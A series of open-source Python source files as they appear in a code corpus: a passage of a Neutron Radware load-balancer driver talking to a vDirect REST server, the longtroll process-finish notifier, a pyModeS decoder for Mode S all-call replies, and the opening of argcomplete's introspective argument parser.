except Exception as exception:
# stop exception propagation, nport may have
# been deleted by other means
LOG.warning(_('pip nport delete failed: %r'),
exception)
return _delete_pip_nports
def create_pool(self, context, pool):
# nothing to do
pass
def update_pool(self, context, old_pool, pool):
self._handle_pool(context, pool)
def delete_pool(self, context, pool,):
self._handle_pool(context, pool, delete=True)
def _handle_pool(self, context, pool, delete=False):
vip_id = self.plugin.get_pool(context, pool['id']).get('vip_id', None)
if vip_id:
if delete:
raise loadbalancer.PoolInUse(pool_id=pool['id'])
else:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
pool['id'], self.l4_action_name,
ext_vip, context, delete, lb_db.Pool, pool['id'])
else:
if delete:
self.plugin._delete_db_pool(context, pool['id'])
else:
# we keep the pool in PENDING_UPDATE
# no point to modify it since it is not connected to vip yet
pass
def create_member(self, context, member):
self._handle_member(context, member)
def update_member(self, context, old_member, member):
self._handle_member(context, member)
def delete_member(self, context, member):
self._handle_member(context, member, delete=True)
def _handle_member(self, context, member, delete=False):
"""Navigate the model. If a Vip is found - activate a bulk WF action.
"""
vip_id = self.plugin.get_pool(
context, member['pool_id']).get('vip_id')
if vip_id:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(
member['pool_id'], self.l4_action_name,
ext_vip, context,
delete, lb_db.Member, member['id'])
# We have to delete this member but it is not connected to a vip yet
elif delete:
self.plugin._delete_db_member(context, member['id'])
def create_health_monitor(self, context, health_monitor):
# Anything to do here? the hm is not connected to the graph yet
pass
def update_pool_health_monitor(self, context, old_health_monitor,
health_monitor,
pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id)
def create_pool_health_monitor(self, context,
health_monitor, pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id)
def delete_pool_health_monitor(self, context, health_monitor, pool_id):
self._handle_pool_health_monitor(context, health_monitor, pool_id,
True)
def _handle_pool_health_monitor(self, context, health_monitor,
pool_id, delete=False):
"""Push a graph to vDirect
Navigate the model. Check if a pool is associated to the vip
and push the graph to vDirect
"""
vip_id = self.plugin.get_pool(context, pool_id).get('vip_id', None)
debug_params = {"hm_id": health_monitor['id'], "pool_id": pool_id,
"delete": delete, "vip_id": vip_id}
LOG.debug(_('_handle_pool_health_monitor. health_monitor = %(hm_id)s '
'pool_id = %(pool_id)s delete = %(delete)s '
'vip_id = %(vip_id)s'),
debug_params)
if vip_id:
vip = self.plugin.get_vip(context, vip_id)
ext_vip = self._populate_vip_graph(context, vip)
self._update_workflow(pool_id, self.l4_action_name,
ext_vip, context,
delete, lb_db.PoolMonitorAssociation,
health_monitor['id'])
elif delete:
self.plugin._delete_db_pool_health_monitor(context,
health_monitor['id'],
pool_id)
def stats(self, context, pool_id):
# TODO(avishayb) implement
return {"bytes_in": 0,
"bytes_out": 0,
"active_connections": 0,
"total_connections": 0}
def _get_vip_network_id(self, context, extended_vip):
subnet = self.plugin._core_plugin.get_subnet(
context, extended_vip['subnet_id'])
return subnet['network_id']
def _start_completion_handling_thread(self):
if not self.completion_handler_started:
LOG.info(_('Starting operation completion handling thread'))
self.completion_handler.start()
self.completion_handler_started = True
def _get_pool_network_id(self, context, extended_vip):
subnet = self.plugin._core_plugin.get_subnet(
context, extended_vip['pool']['subnet_id'])
return subnet['network_id']
@call_log.log
def _update_workflow(self, wf_name, action,
wf_params, context,
delete=False,
lbaas_entity=None, entity_id=None):
"""Update the WF state. Push the result to a queue for processing."""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if action not in self.actions_to_skip:
params = _translate_vip_object_graph(wf_params,
self.plugin,
context)
else:
params = wf_params
resource = '/api/workflow/%s/action/%s' % (wf_name, action)
response = _rest_wrapper(self.rest_client.call('POST', resource,
{'parameters': params},
TEMPLATE_HEADER))
LOG.debug(_('_update_workflow response: %s '), response)
if action not in self.actions_to_skip:
ids = params.pop('__ids__', None)
oper = OperationAttributes(response['uri'],
ids,
lbaas_entity,
entity_id,
delete=delete)
LOG.debug(_('Pushing operation %s to the queue'), oper)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _remove_workflow(self, ids, context, post_remove_function):
wf_name = ids['pool']
LOG.debug(_('Remove the workflow %s') % wf_name)
resource = '/api/workflow/%s' % (wf_name)
rest_return = self.rest_client.call('DELETE', resource, None, None)
response = _rest_wrapper(rest_return, [204, 202, 404])
if rest_return[RESP_STATUS] == 404:
if post_remove_function:
try:
post_remove_function(True)
LOG.debug(_('Post-remove workflow function '
'%r completed'), post_remove_function)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Post-remove workflow function '
'%r failed'), post_remove_function)
self.plugin._delete_db_vip(context, ids['vip'])
else:
oper = OperationAttributes(
response['uri'],
ids,
lb_db.Vip,
ids['vip'],
delete=True,
post_op_function=post_remove_function)
LOG.debug(_('Pushing operation %s to the queue'), oper)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _remove_service(self, service_name):
resource = '/api/service/%s' % (service_name)
_rest_wrapper(self.rest_client.call('DELETE',
resource, None, None),
[202])
def _get_service(self, ext_vip):
"""Get a service name.
if you can't find one,
create a service and create l2_l3 WF.
"""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if ext_vip['vip_network_id'] != ext_vip['pool_network_id']:
networks_name = '%s_%s' % (ext_vip['vip_network_id'],
ext_vip['pool_network_id'])
self.l2_l3_ctor_params["twoleg_enabled"] = True
else:
networks_name = ext_vip['vip_network_id']
self.l2_l3_ctor_params["twoleg_enabled"] = False
incoming_service_name = 'srv_%s' % (networks_name,)
service_name = self._get_available_service(incoming_service_name)
if not service_name:
LOG.debug(
'Could not find a service named ' + incoming_service_name)
service_name = self._create_service(ext_vip['vip_network_id'],
ext_vip['pool_network_id'],
ext_vip['tenant_id'])
self.l2_l3_ctor_params["service"] = incoming_service_name
wf_name = 'l2_l3_' + networks_name
self._create_workflow(
wf_name, self.l2_l3_wf_name, self.l2_l3_ctor_params)
self._update_workflow(
wf_name, "setup_l2_l3", self.l2_l3_setup_params, None)
else:
LOG.debug('A service named ' + service_name + ' was found.')
return service_name
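    # Naming convention used above, with hypothetical network ids: a one-leg
    # service for network 'net-A' is looked up as 'srv_net-A', while a VIP and
    # pool split across 'net-A'/'net-B' yield 'srv_net-A_net-B' plus a matching
    # 'l2_l3_net-A_net-B' workflow built from the l2_l3 template.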
def _create_service(self, vip_network_id, pool_network_id, tenant_id):
"""create the service and provision it (async)."""
# 1) create the service
service = copy.deepcopy(self.service)
if vip_network_id != pool_network_id:
service_name = 'srv_%s_%s' % (vip_network_id, pool_network_id)
service['primary']['network']['portgroups'] = [vip_network_id,
pool_network_id]
else:
service_name = 'srv_' + vip_network_id
service['primary']['network']['portgroups'] = [vip_network_id]
resource = '/api/service?name=%s&tenant=%s' % (service_name, tenant_id)
response = _rest_wrapper(self.rest_client.call('POST', resource,
service,
CREATE_SERVICE_HEADER), [201])
# 2) provision the service
provision_uri = response['links']['actions']['provision']
_rest_wrapper(self.rest_client.call('POST', provision_uri,
None, PROVISION_HEADER))
return service_name
def _get_available_service(self, service_name):
"""Check if service exists and return its name if it does."""
resource = '/api/service/' + service_name
try:
_rest_wrapper(self.rest_client.call('GET',
resource,
None, None), [200])
except Exception:
return
return service_name
def _workflow_exists(self, pool_id):
"""Check if a WF having the name of the pool_id exists."""
resource = '/api/workflow/' + pool_id
try:
_rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
except Exception:
return False
return True
def _create_workflow(self, wf_name, wf_template_name,
create_workflow_params=None):
"""Create a WF if it doesn't exists yet."""
if not self.workflow_templates_exists:
self._verify_workflow_templates()
if not self._workflow_exists(wf_name):
if not create_workflow_params:
create_workflow_params = {}
resource = '/api/workflowTemplate/%s?name=%s' % (
wf_template_name, wf_name)
params = {'parameters': create_workflow_params}
response = _rest_wrapper(self.rest_client.call('POST',
resource,
params,
TEMPLATE_HEADER))
LOG.debug(_('create_workflow response: %s'), str(response))
def _verify_workflow_templates(self):
"""Verify the existence of workflows on vDirect server."""
workflows = {self.l2_l3_wf_name:
False, self.l4_wf_name: False}
resource = '/api/workflowTemplate'
response = _rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
for wf in workflows.keys():
for wf_template in response:
if wf == wf_template['name']:
workflows[wf] = True
break
for wf, found in workflows.items():
if not found:
raise r_exc.WorkflowMissing(workflow=wf)
self.workflow_templates_exists = True
def _get_pip(self, context, tenant_id, port_name,
network_id, subnet_id):
"""Get proxy IP
Creates or get port on network_id, returns that port's IP
on the subnet_id.
"""
port_filter = {
'name': [port_name],
}
ports = self.plugin._core_plugin.get_ports(context,
filters=port_filter)
if not ports:
# create port, we just want any IP allocated to the port
# based on the network id and subnet_id
port_data = {
'tenant_id': tenant_id,
'name': port_name,
'network_id': network_id,
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': False,
'device_id': '',
'device_owner': 'neutron:' + constants.LOADBALANCER,
'fixed_ips': [{'subnet_id': subnet_id}]
}
port = self.plugin._core_plugin.create_port(context,
{'port': port_data})
else:
port = ports[0]
ips_on_subnet = [ip for ip in port['fixed_ips']
if ip['subnet_id'] == subnet_id]
if not ips_on_subnet:
raise Exception(_('Could not find or allocate '
'IP address for subnet id %s'),
subnet_id)
else:
return ips_on_subnet[0]['ip_address']
class vDirectRESTClient:
"""REST server proxy to Radware vDirect."""
def __init__(self,
server='localhost',
secondary_server=None,
user=None,
password=None,
port=2189,
ssl=True,
timeout=5000,
base_uri=''):
self.server = server
self.secondary_server = secondary_server
self.port = port
self.ssl = ssl
self.base_uri = base_uri
self.timeout = timeout
if user and password:
self.auth = base64.encodestring('%s:%s' % (user, password))
self.auth = self.auth.replace('\n', '')
else:
raise r_exc.AuthenticationMissing()
debug_params = {'server': self.server,
'sec_server': self.secondary_server,
'port': self.port,
'ssl': self.ssl}
LOG.debug(_('vDirectRESTClient:init server=%(server)s, '
'secondary server=%(sec_server)s, '
'port=%(port)d, '
'ssl=%(ssl)r'), debug_params)
def _flip_servers(self):
        LOG.warning(_('Flipping servers. Current is: %(server)s, '
'switching to %(secondary)s'),
{'server': self.server,
'secondary': self.secondary_server})
self.server, self.secondary_server = self.secondary_server, self.server
def _recover(self, action, resource, data, headers, binary=False):
if self.server and self.secondary_server:
self._flip_servers()
resp = self._call(action, resource, data,
headers, binary)
return resp
else:
LOG.exception(_('REST client is not able to recover '
'since only one vDirect server is '
'configured.'))
return -1, None, None, None
def call(self, action, resource, data, headers, binary=False):
resp = self._call(action, resource, data, headers, binary)
if resp[RESP_STATUS] == -1:
LOG.warning(_('vDirect server is not responding (%s).'),
self.server)
return self._recover(action, resource, data, headers, binary)
elif resp[RESP_STATUS] in (301, 307):
LOG.warning(_('vDirect server is not active (%s).'),
self.server)
return self._recover(action, resource, data, headers, binary)
else:
return resp
@call_log.log
def _call(self, action, resource, data, headers, binary=False):
if resource.startswith('http'):
uri = resource
else:
uri = self.base_uri + resource
if binary:
body = data
else:
body = jsonutils.dumps(data)
debug_data = 'binary' if binary else body
debug_data = debug_data if debug_data else 'EMPTY'
if not headers:
headers = {'Authorization': 'Basic %s' % self.auth}
else:
headers['Authorization'] = 'Basic %s' % self.auth
conn = None
if self.ssl:
conn = httplib.HTTPSConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('vdirectRESTClient: Could not establish HTTPS '
'connection'))
return 0, None, None, None
else:
conn = httplib.HTTPConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('vdirectRESTClient: Could not establish HTTP '
'connection'))
return 0, None, None, None
try:
conn.request(action, uri, body, headers)
response = conn.getresponse()
respstr = response.read()
respdata = respstr
try:
respdata = jsonutils.loads(respstr)
except ValueError:
# response was not JSON, ignore the exception
pass
ret = (response.status, response.reason, respstr, respdata)
except Exception as e:
log_dict = {'action': action, 'e': e}
LOG.error(_('vdirectRESTClient: %(action)s failure, %(e)r'),
log_dict)
ret = -1, None, None, None
conn.close()
return ret
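# Hedged usage sketch (server address below is illustrative):
#   client = vDirectRESTClient(server='10.0.0.5', user='vDirect',
#                              password='radware')
#   status, reason, body, data = client.call('GET', '/api/workflowTemplate',
#                                            None, None)
# call() returns the 4-tuple indexed by RESP_STATUS/RESP_REASON/RESP_STR/
# RESP_DATA and retries against the secondary server when the primary reports
# -1, 301 or 307.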
class OperationAttributes:
"""Holds operation attributes.
The parameter 'post_op_function' (if supplied) is a function that takes
one boolean argument, specifying the success of the operation
"""
def __init__(self,
operation_url,
object_graph,
lbaas_entity=None,
entity_id=None,
delete=False,
post_op_function=None):
self.operation_url = operation_url
self.object_graph = object_graph
self.delete = delete
self.lbaas_entity = lbaas_entity
self.entity_id = entity_id
self.creation_time = time.time()
self.post_op_function = post_op_function
def __repr__(self):
items = ("%s = %r" % (k, v) for k, v in self.__dict__.items())
return "<%s: {%s}>" % (self.__class__.__name__, ', '.join(items))
class OperationCompletionHandler(threading.Thread):
"""Update DB with operation status or delete the entity from DB."""
def __init__(self, queue, rest_client, plugin):
threading.Thread.__init__(self)
self.queue = queue
self.rest_client = rest_client
self.plugin = plugin
self.stoprequest = threading.Event()
self.opers_to_handle_before_rest = 0
def join(self, timeout=None):
self.stoprequest.set()
super(OperationCompletionHandler, self).join(timeout)
def handle_operation_completion(self, oper):
result = self.rest_client.call('GET',
oper.operation_url,
None,
None)
completed = result[RESP_DATA]['complete']
        reason = result[RESP_REASON]
description = result[RESP_STR]
if completed:
# operation is done - update the DB with the status
# or delete the entire graph from DB
success = result[RESP_DATA]['success']
sec_to_completion = time.time() - oper.creation_time
debug_data = {'oper': oper,
'sec_to_completion': sec_to_completion,
'success': success}
LOG.debug(_('Operation %(oper)s is completed after '
'%(sec_to_completion)d sec '
'with success status: %(success)s :'),
debug_data)
db_status = None
if not success:
                # failure - log it and set ERROR as the DB state
if reason or description:
msg = 'Reason:%s. Description:%s' % (reason, description)
else:
msg = "unknown"
error_params = {"operation": oper, "msg": msg}
LOG.error(_('Operation %(operation)s failed. Reason: %(msg)s'),
error_params)
db_status = constants.ERROR
else:
if oper.delete:
_remove_object_from_db(self.plugin, oper)
else:
db_status = constants.ACTIVE
if db_status:
_update_vip_graph_status(self.plugin, oper, db_status)
OperationCompletionHandler._run_post_op_function(success, oper)
return completed
def run(self):
while not self.stoprequest.isSet():
try:
oper = self.queue.get(timeout=1)
# Get the current queue size (N) and set the counter with it.
# Handle N operations with no intermission.
                # Once N operations are handled, get the size again and repeat.
if self.opers_to_handle_before_rest <= 0:
self.opers_to_handle_before_rest = self.queue.qsize() + 1
LOG.debug('Operation consumed from the queue: ' +
str(oper))
                # check the status - if oper is done: update the db,
# else push the oper again to the queue
if not self.handle_operation_completion(oper):
                    LOG.debug(_('Operation %s is not completed yet.'), oper)
# Not completed - push to the queue again
self.queue.put_nowait(oper)
self.queue.task_done()
self.opers_to_handle_before_rest -= 1
# Take one second rest before start handling
# new operations or operations handled before
if self.opers_to_handle_before_rest <= 0:
time.sleep(1)
except Queue.Empty:
continue
except Exception:
m = _("Exception was thrown inside OperationCompletionHandler")
LOG.exception(m)
@staticmethod
def _run_post_op_function(success, oper):
if oper.post_op_function:
log_data = {'func': oper.post_op_function, 'oper': oper}
try:
oper.post_op_function(success)
LOG.debug(_('Post-operation function '
'%(func)r completed '
'after operation %(oper)r'),
log_data)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_('Post-operation function '
'%(func)r failed '
'after operation %(oper)r'),
log_data)
def _rest_wrapper(response, success_codes=[202]):
"""Wrap a REST call and make sure a valid status is returned."""
if not response:
raise r_exc.RESTRequestFailure(
status=-1,
reason="Unknown",
description="Unknown",
success_codes=success_codes
)
elif response[RESP_STATUS] not in success_codes:
raise r_exc.RESTRequestFailure(
status=response[RESP_STATUS],
reason=response[RESP_REASON],
description=response[RESP_STR],
success_codes=success_codes
)
else:
return response[RESP_DATA]
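# Hypothetical sketch of how _rest_wrapper() is typically consumed: pass it the
# raw (status, reason, body, json) tuple returned by vDirectRESTClient.call()
# and get back only the parsed JSON payload, or a RESTRequestFailure on an
# unexpected status code. The resource path below is a placeholder.
def _rest_wrapper_example(client):
    response = client.call('GET', '/api/status', None, None)
    return _rest_wrapper(response, success_codes=[200, 202])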
def _make_pip_name_from_vip(vip):
"""Standard way of making PIP name based on VIP ID."""
return 'pip_' + vip['id']
def _update_vip_graph_status(plugin, oper, status):
"""Update the status
    of the whole VIP object graph or of a specific entity in the graph.
    """
ctx = context.get_admin_context(load_admin_roles=False)
LOG.debug(_('_update: %s '), oper)
if oper.lbaas_entity == lb_db.PoolMonitorAssociation:
plugin.update_pool_health_monitor(ctx,
oper.entity_id,
oper.object_graph['pool'],
status)
elif oper.entity_id:
plugin.update_status(ctx,
oper.lbaas_entity,
oper.entity_id,
status)
else:
_update_vip_graph_status_cascade(plugin,
oper.object_graph,
ctx, status)
def _update_vip_graph_status_cascade(plugin, ids, ctx, status):
plugin.update_status(ctx,
lb_db.Vip,
ids['vip'],
status)
plugin.update_status(ctx,
lb_db.Pool,
ids['pool'],
status)
for member_id in ids['members']:
plugin.update_status(ctx,
lb_db.Member,
member_id,
status)
for hm_id in ids['health_monitors']:
plugin.update_pool_health_monitor(ctx,
hm_id,
ids['pool'],
status)
def _remove_object_from_db(plugin, oper):
"""Remove a specific entity from db."""
LOG.debug(_('_remove_object_from_db %s'), str(oper))
ctx = context.get_admin_context(load_admin_roles=False)
if oper.lbaas_entity == lb_db.PoolMonitorAssociation:
plugin._delete_db_pool_health_monitor(ctx,
oper.entity_id,
oper.object_graph['pool'])
elif oper.lbaas_entity == lb_db.Member:
plugin._delete_db_member(ctx, oper.entity_id)
elif oper.lbaas_entity == lb_db.Vip:
plugin._delete_db_vip(ctx, oper.entity_id)
elif oper.lbaas_entity == lb_db.Pool:
plugin._delete_db_pool(ctx, oper.entity_id)
else:
raise r_exc.UnsupportedEntityOperation(
operation='Remove from DB', entity=oper.lbaas_entity
)
TRANSLATION_DEFAULTS = {'session_persistence_type': 'none',
'session_persistence_cookie_name': 'none',
'url_path': '/',
'http_method': 'GET',
'expected_codes': '200',
'subnet': '255.255.255.255',
'mask': '255.255.255.255',
'gw': '255.255.255.255',
}
VIP_PROPERTIES = ['address', 'protocol_port', 'protocol', 'connection_limit',
'admin_state_up', 'session_persistence_type',
'session_persistence_cookie_name']
POOL_PROPERTIES = ['protocol', 'lb_method', 'admin_state_up']
MEMBER_PROPERTIES = ['address', 'protocol_port', 'weight', 'admin_state_up',
'subnet', 'mask', 'gw']
HEALTH_MONITOR_PROPERTIES = ['type', 'delay', 'timeout', 'max_retries',
'admin_state_up', 'url_path', 'http_method',
'expected_codes', 'id']
def _translate_vip_object_graph(extended_vip, plugin, context):
"""Translate the extended vip
    into a structure that can be
understood by the workflow.
"""
def _create_key(prefix, property_name):
return prefix + '_' + property_name + '_array'
def _trans_prop_name(prop_name):
if prop_name == 'id':
return 'uuid'
else:
return prop_name
def get_ids(extended_vip):
ids = {}
ids['vip'] = extended_vip['id']
ids['pool'] = extended_vip['pool']['id']
ids['members'] = [m['id'] for m in extended_vip['members']]
ids['health_monitors'] = [
hm['id'] for hm in extended_vip['health_monitors']
]
return ids
trans_vip = {}
LOG.debug('Vip graph to be translated: ' + str(extended_vip))
for vip_property in VIP_PROPERTIES:
trans_vip['vip_' + vip_property] = extended_vip.get(
vip_property, TRANSLATION_DEFAULTS.get(vip_property))
for pool_property in POOL_PROPERTIES:
trans_vip['pool_' + pool_property] = extended_vip[
'pool'][pool_property]
for member_property in MEMBER_PROPERTIES:
trans_vip[_create_key('member', member_property)] = []
two_leg = (extended_vip['pip_address'] != extended_vip['address'])
if two_leg:
pool_subnet = plugin._core_plugin.get_subnet(
context, extended_vip['pool']['subnet_id'])
for member in extended_vip['members']:
if member['status'] != constants.PENDING_DELETE:
if (two_leg and netaddr.IPAddress(member['address'])
not in netaddr.IPNetwork(pool_subnet['cidr'])):
member_ports = plugin._core_plugin.get_ports(
context,
filters={'fixed_ips': {'ip_address': [member['address']]},
'tenant_id': [extended_vip['tenant_id']]})
if len(member_ports) == 1:
member_subnet = plugin._core_plugin.get_subnet(
context,
member_ports[0]['fixed_ips'][0]['subnet_id'])
member_network = netaddr.IPNetwork(member_subnet['cidr'])
member['subnet'] = str(member_network.network)
member['mask'] = str(member_network.netmask)
else:
member['subnet'] = member['address']
member['gw'] = pool_subnet['gateway_ip']
for member_property in MEMBER_PROPERTIES:
trans_vip[_create_key('member', member_property)].append(
member.get(member_property,
TRANSLATION_DEFAULTS.get(member_property)))
for hm_property in HEALTH_MONITOR_PROPERTIES:
trans_vip[
_create_key('hm', _trans_prop_name(hm_property))] = []
for hm in extended_vip['health_monitors']:
hm_pool = plugin.get_pool_health_monitor(context,
hm['id'],
extended_vip['pool']['id'])
if hm_pool['status'] != constants.PENDING_DELETE:
for hm_property in HEALTH_MONITOR_PROPERTIES:
value = hm.get(hm_property,
TRANSLATION_DEFAULTS.get(hm_property))
trans_vip[_create_key('hm',
_trans_prop_name(hm_property))].append(value)
ids = get_ids(extended_vip)
trans_vip['__ids__'] = ids
for key in ['pip_address']:
if key in extended_vip:
trans_vip[key] = extended_vip[key]
LOG.debug('Translated Vip graph: ' + str(trans_vip))
return trans_vip
|
shakamunyi/neutron-vrrp
|
neutron/services/loadbalancer/drivers/radware/driver.py
|
Python
|
apache-2.0
| 45,498 | 0.000374 |
'''longtroll: Notify you when your long-running processes finish.'''
import argparse
import getpass
import os
import pickle
import re
import subprocess
import time
collapse_whitespace_re = re.compile('[ \t][ \t]*')
def spawn_notify(notifier, proc_ended):
cmd = notifier.replace('<cmd>', proc_ended[0])
cmd = cmd.replace('<pid>', str(proc_ended[1]))
subprocess.Popen(cmd, shell=True)
def get_user_processes(user):
def line_to_dict(line):
line = re.sub(collapse_whitespace_re, ' ', line).strip()
time, pid, ppid, command = line.split(' ', 3)
try:
return {
'age': etime_to_secs(time),
'pid': int(pid),
'ppid': int(ppid),
'command': command,
}
except Exception:
print('Caught exception for line: %s' % line)
raise
ps_out = subprocess.Popen(' '.join([
'ps', '-U %s' % user, '-o etime,pid,ppid,command']),
shell=True, stdout=subprocess.PIPE).communicate()[0]
for line in ps_out.split('\n')[1:]:
if line: yield line_to_dict(line)
def etime_to_secs(etime):
'Parsing etimes is rougher than it should be.'
seconds = 0
etime = etime.split('-')
if len(etime) == 2:
seconds += int(etime[0]) * 24 * 60 * 60
etime = etime[1]
else:
etime = etime[0]
etime = etime.split(':')
if len(etime) == 3:
seconds += int(etime[0]) * 60 * 60
mins, secs = etime[1:]
else:
mins, secs = etime
seconds += 60 * int(mins) + int(secs)
return seconds
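# Hypothetical self-check (never called by longtroll itself) illustrating the
# "[[dd-]hh:]mm:ss" etime formats that etime_to_secs() accepts.
def _etime_to_secs_examples():
    assert etime_to_secs('05:32') == 5 * 60 + 32
    assert etime_to_secs('01:05:32') == 1 * 3600 + 5 * 60 + 32
    assert etime_to_secs('2-01:05:32') == 2 * 86400 + 1 * 3600 + 5 * 60 + 32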
def filter_by_parent(ppid, procs):
return (proc for proc in procs if proc['ppid'] == ppid)
def filter_by_min_age(min_age, procs):
return (proc for proc in procs if proc['age'] >= min_age)
def long_procs(ppid, min_age):
user_processes = get_user_processes(getpass.getuser())
user_procs_with_parent = filter_by_parent(ppid, user_processes)
user_procs_with_min_age = filter_by_min_age(min_age, user_procs_with_parent)
return set(
(proc['command'], proc['pid']) for proc in user_procs_with_min_age)
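# Hypothetical example of a ~/.longtrollrc that main() below would accept.
# Each line is "<key> <value>"; 'seconds' and 'notify' are both required, and
# '<cmd>'/'<pid>' in the notify command are substituted by spawn_notify():
#
#   seconds 30
#   notify notify-send "Finished: <cmd>" "pid <pid>"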
def main():
import sys
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
'--config_file', '-c', metavar='FILE', default='~/.longtrollrc',
help='Configuration file to load')
parser.add_argument(
'--ppid', '-p', default=os.getppid(), type=int,
help='The parent PID of processes to notify for. Defaults to the parent '
'PID of longtroll (usually the PID of your shell).')
parser.add_argument('mode', action='store', help='Either "bind" or "watch"')
args = parser.parse_args()
options_dict = {}
try:
with open(os.path.expanduser(args.config_file)) as config_file:
for line in config_file:
key, val = line.split(' ', 1)
options_dict[key] = val
except IOError:
print('Could not read config file:')
raise
if 'seconds' not in options_dict:
print('Must specify "seconds" option in config file')
return
if 'notify' not in options_dict:
print('Must specify "notify" option in config file')
return
min_age = int(options_dict['seconds'])
notify = options_dict['notify']
if args.mode == 'watch':
last_procs = long_procs(args.ppid, min_age)
while True:
procs = long_procs(args.ppid, min_age)
ended_procs = last_procs - procs
if ended_procs:
for proc in ended_procs:
spawn_notify(notify, proc)
last_procs = procs
time.sleep(3)
else:
cmd = 'python %s --config_file %s --ppid %d watch' % (
__file__, args.config_file, args.ppid)
subprocess.Popen(cmd, shell=True)
if __name__ == '__main__':
main()
|
haldean/longtroll
|
longtroll/longtroll.py
|
Python
|
mit
| 3,588 | 0.015886 |
"""
Decode all-call reply messages, with downlink format 11
"""
from pyModeS import common
def _checkdf(func):
"""Ensure downlink format is 11."""
def wrapper(msg):
df = common.df(msg)
if df != 11:
raise RuntimeError(
"Incorrect downlink format, expect 11, got {}".format(df)
)
return func(msg)
return wrapper
@_checkdf
def icao(msg):
"""Decode transponder code (ICAO address).
Args:
msg (str): 14 hexdigits string
Returns:
string: ICAO address
"""
return common.icao(msg)
@_checkdf
def interrogator(msg):
"""Decode interrogator identifier code.
Args:
msg (str): 14 hexdigits string
Returns:
int: interrogator identifier code
"""
    # The CRC remainder contains the CL and IC fields: the top three bits are
    # the CL field and the last four bits are the IC field.
    remainder = common.crc(msg)
    if remainder > 79:
        IC = "corrupt IC"
    elif remainder < 16:
        IC = "II" + str(remainder)
    else:
        IC = "SI" + str(remainder - 16)
return IC
@_checkdf
def capability(msg):
"""Decode transponder capability.
Args:
msg (str): 14 hexdigits string
Returns:
int, str: transponder capability, description
"""
msgbin = common.hex2bin(msg)
ca = common.bin2int(msgbin[5:8])
if ca == 0:
text = "level 1 transponder"
elif ca == 4:
text = "level 2 transponder, ability to set CA to 7, on ground"
elif ca == 5:
text = "level 2 transponder, ability to set CA to 7, airborne"
elif ca == 6:
        text = "level 2 transponder, ability to set CA to 7, either airborne or on the ground"
    elif ca == 7:
        text = "Downlink Request value is 0, or the Flight Status is 2, 3, 4 or 5, either airborne or on the ground"
else:
text = None
return ca, text
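# Hypothetical usage sketch: given a 14-hexdigit DF11 all-call reply captured
# from a Mode S receiver, collect the decoded fields in one place. No real
# message is hard-coded here; supply your own capture.
def _decode_allcall_example(msg):
    return {
        "icao": icao(msg),
        "interrogator": interrogator(msg),
        "capability": capability(msg),
    }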
|
junzis/pyModeS
|
pyModeS/decoder/allcall.py
|
Python
|
gpl-3.0
| 1,888 | 0.003178 |
# Copyright 2012-2013, Andrey Kislyuk and argcomplete contributors.
# Licensed under the Apache License. See https://github.com/kislyuk/argcomplete for more info.
from argparse import ArgumentParser, ArgumentError, SUPPRESS, _SubParsersAction
from argparse import OPTIONAL, ZERO_OR_MORE, ONE_OR_MORE, REMAINDER, PARSER
from argparse import _get_action_name, _
_num_consumed_args = {}
def action_is_satisfied(action):
''' Returns False if the parse would raise an error if no more arguments are given to this action, True otherwise.
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.nargs in [OPTIONAL, ZERO_OR_MORE, REMAINDER]:
return True
if action.nargs == ONE_OR_MORE:
return num_consumed_args >= 1
if action.nargs == PARSER:
# Not sure what this should be, but this previously always returned False
# so at least this won't break anything that wasn't already broken.
return False
if action.nargs is None:
return num_consumed_args == 1
assert isinstance(action.nargs, int), 'failed to handle a possible nargs value: %r' % action.nargs
return num_consumed_args == action.nargs
def action_is_open(action):
''' Returns True if action could consume more arguments (i.e., its pattern is open).
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.nargs in [ZERO_OR_MORE, ONE_OR_MORE, PARSER, REMAINDER]:
return True
if action.nargs == OPTIONAL or action.nargs is None:
return num_consumed_args == 0
assert isinstance(action.nargs, int), 'failed to handle a possible nargs value: %r' % action.nargs
return num_consumed_args < action.nargs
def action_is_greedy(action, isoptional=False):
''' Returns True if action will necessarily consume the next argument.
isoptional indicates whether the argument is an optional (starts with -).
'''
num_consumed_args = _num_consumed_args.get(action, 0)
if action.option_strings:
if not isoptional and not action_is_satisfied(action):
return True
return action.nargs == REMAINDER
else:
return action.nargs == REMAINDER and num_consumed_args >= 1
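# Hypothetical illustration (the parser and option are made up) of the helpers
# above for an optional taking exactly one value (nargs=None): before a value
# is consumed the action is open but not satisfied; after one value it is
# satisfied and closed. _num_consumed_args is normally filled in while
# IntrospectiveArgumentParser parses.
def _nargs_helpers_example():
    parser = ArgumentParser()
    action = parser.add_argument('--name')
    _num_consumed_args[action] = 0
    before = (action_is_satisfied(action), action_is_open(action))  # (False, True)
    _num_consumed_args[action] = 1
    after = (action_is_satisfied(action), action_is_open(action))   # (True, False)
    return before, after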
class IntrospectiveArgumentParser(ArgumentParser):
''' The following is a verbatim copy of ArgumentParser._parse_known_args (Python 2.7.3),
except for the lines that contain the string "Added by argcomplete".
'''
def _parse_known_args(self, arg_strings, namespace):
_num_consumed_args.clear() # Added by argcomplete
self._argcomplete_namespace = namespace
self.active_actions = [] # Added by argcomplete
# replace arg strings that are file references
if self.fromfile_prefix_chars is not None:
arg_strings = self._read_args_from_files(arg_strings)
# map all mutually exclusive arguments to the other arguments
# they can't occur with
action_conflicts = {}
self._action_conflicts = action_conflicts # Added by argcomplete
for mutex_group in self._mutually_exclusive_groups:
group_actions = mutex_group._group_actions
for i, mutex_action in enumerate(mutex_group._group_actions):
conflicts = action_conflicts.setdefault(mutex_action, [])
